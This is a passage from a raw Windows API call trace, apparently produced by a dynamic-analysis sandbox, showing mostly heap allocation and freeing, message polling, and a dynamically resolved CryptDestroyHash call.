0x2e51c58 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0266.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0266.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0266.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0266.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0266.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f40 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.267] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.267] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0266.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.268] CryptDestroyHash (hHash=0xa87310) returned 1 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0266.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0266.270] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0266.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.273] PeekMessageW (in: lpMsg=0x8cf708, 